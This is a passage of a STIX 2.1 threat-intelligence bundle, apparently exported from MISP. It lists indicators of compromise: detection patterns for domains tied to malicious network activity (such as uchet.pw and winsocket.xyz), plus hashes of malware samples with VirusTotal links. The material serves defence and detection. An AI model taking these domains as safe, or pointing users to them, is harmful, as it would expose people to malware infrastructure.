"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'solotender.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0a-a614-4052-8292-46d6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'sslprivate.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0b-1180-4934-9f48-4a18950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'tapalulumba.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0c-86f8-4bb8-bd40-4e5c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'taskhoper.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0d-ac94-4719-b647-46c2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'titleworld.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0e-b390-4a6e-8f96-4206950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'torglend.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0e-1650-4e7f-b7bc-4358950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'tradertop.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d0f-f340-4cc4-9763-49c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'trendkop.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d10-5724-47e2-9c31-40a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'tyuocruz1312.net']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d11-e9d4-423b-9eb4-4e42950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'uchet.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d12-b6a8-4886-bfdb-4cf8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'uchet.space']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d13-6a18-409e-8f58-46de950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'visitpalace.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d14-7c44-4c56-9785-45fa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'volumexp.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d14-d7bc-4996-890f-4acd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'vortexenism.biz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d15-3fec-4ac8-960c-4980950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'vpnserv.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d16-9b5c-4db8-8374-4fb3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'vwv.flashclicks.info']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"hostname\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d17-c47c-4633-8083-4adc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'winsocket.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6d18-c13c-4145-8ad5-4cad950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'yearreviews.net']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fce-0988-4db1-8baf-42ee02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:10.000Z",
|
|
"modified": "2017-03-29T09:35:10.000Z",
|
|
"description": "sample - Xchecked via VT: 810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41",
|
|
"pattern": "[file:hashes.SHA1 = 'fd6e12e35b8cf0a42a91b172dc9d69605e2f6050']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fcf-43f0-4407-901a-42a902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:11.000Z",
|
|
"modified": "2017-03-29T09:35:11.000Z",
|
|
"description": "sample - Xchecked via VT: 810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41",
|
|
"pattern": "[file:hashes.MD5 = '7ab177df0519afdeea7d61c3f63000ef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fd0-6924-4e1f-8671-460002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:12.000Z",
|
|
"modified": "2017-03-29T09:35:12.000Z",
|
|
"first_observed": "2017-03-29T09:35:12Z",
|
|
"last_observed": "2017-03-29T09:35:12Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fd0-6924-4e1f-8671-460002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fd0-6924-4e1f-8671-460002de0b81",
|
|
"value": "https://www.virustotal.com/file/810aed604e1ec5d5aec00c783bc44e5ca753c5c0f2dc64f431c8f8d48b6dbf41/analysis/1426058549/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd1-f414-4ef4-9a54-423402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:13.000Z",
|
|
"modified": "2017-03-29T09:35:13.000Z",
|
|
"description": "sample - Xchecked via VT: 44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5",
|
|
"pattern": "[file:hashes.SHA1 = 'd93b3807a23d083b75aeeb46a715f1e20649ff20']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd2-f594-452b-9718-4ab402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:14.000Z",
|
|
"modified": "2017-03-29T09:35:14.000Z",
|
|
"description": "sample - Xchecked via VT: 44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5",
|
|
"pattern": "[file:hashes.MD5 = '67380622a8ceb0a938e0c343282b09f3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fd3-4d94-4938-a2e2-4e7f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:15.000Z",
|
|
"modified": "2017-03-29T09:35:15.000Z",
|
|
"first_observed": "2017-03-29T09:35:15Z",
|
|
"last_observed": "2017-03-29T09:35:15Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fd3-4d94-4938-a2e2-4e7f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fd3-4d94-4938-a2e2-4e7f02de0b81",
|
|
"value": "https://www.virustotal.com/file/44cd0fdb877838f559d60500cd08cee66d8a79005d7e86f81671c18ec7ab3cb5/analysis/1424841893/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd4-2ef8-4459-81d4-426502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:16.000Z",
|
|
"modified": "2017-03-29T09:35:16.000Z",
|
|
"description": "sample - Xchecked via VT: 7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106",
|
|
"pattern": "[file:hashes.SHA1 = '761913778f8a60c81b0dfff5b84196728ac5d948']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd5-fdac-483d-82d3-495d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:17.000Z",
|
|
"modified": "2017-03-29T09:35:17.000Z",
|
|
"description": "sample - Xchecked via VT: 7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106",
|
|
"pattern": "[file:hashes.MD5 = 'e7c60ee03e7d950f5a36c573b67a73f1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fd6-5f14-4030-9f46-453302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:18.000Z",
|
|
"modified": "2017-03-29T09:35:18.000Z",
|
|
"first_observed": "2017-03-29T09:35:18Z",
|
|
"last_observed": "2017-03-29T09:35:18Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fd6-5f14-4030-9f46-453302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fd6-5f14-4030-9f46-453302de0b81",
|
|
"value": "https://www.virustotal.com/file/7451c813eebe45ee8c743abc5e75c9475cab427d44e9a255f89f73c4e7ca7106/analysis/1424438716/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd7-0138-4bf1-a8ae-412d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:19.000Z",
|
|
"modified": "2017-03-29T09:35:19.000Z",
|
|
"description": "sample - Xchecked via VT: 187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3",
|
|
"pattern": "[file:hashes.SHA1 = 'c2703b928dd31f2a588f9fab7ce8a5381d853ec1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd8-3838-4c83-a078-4c0302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:20.000Z",
|
|
"modified": "2017-03-29T09:35:20.000Z",
|
|
"description": "sample - Xchecked via VT: 187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3",
|
|
"pattern": "[file:hashes.MD5 = 'aab24456ed9bb6247103aebe036bc381']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fd9-8f98-437f-9ba7-4fc202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:21.000Z",
|
|
"modified": "2017-03-29T09:35:21.000Z",
|
|
"first_observed": "2017-03-29T09:35:21Z",
|
|
"last_observed": "2017-03-29T09:35:21Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fd9-8f98-437f-9ba7-4fc202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db7fd9-8f98-437f-9ba7-4fc202de0b81",
|
|
"value": "https://www.virustotal.com/file/187155b727346d63c1b1c8e4e3ae88aed89746a4a323b5170139fa5aa760b3a3/analysis/1424203377/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fd9-62e8-4eee-8733-44b702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:21.000Z",
|
|
"modified": "2017-03-29T09:35:21.000Z",
|
|
"description": "sample - Xchecked via VT: bb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac",
|
|
"pattern": "[file:hashes.SHA1 = 'fcbfffa35715ad97289acfba1506074599c798ea']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db7fda-16b8-484f-b291-4fe402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:22.000Z",
|
|
"modified": "2017-03-29T09:35:22.000Z",
|
|
"description": "sample - Xchecked via VT: bb05a0d905b915e2e84a8e69c2af438f72730131c5a1e3e1fe85df13c61182ac",
|
|
"pattern": "[file:hashes.MD5 = '074b34cf6002c635be5c3176ab5e689d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:35:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db7fdb-c6fc-41a5-b9fb-411502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:35:23.000Z",
|
|
"modified": "2017-03-29T09:35:23.000Z",
|
|
"first_observed": "2017-03-29T09:35:23Z",
|
|
"last_observed": "2017-03-29T09:35:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db7fdb-c6fc-41a5-b9fb-411502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
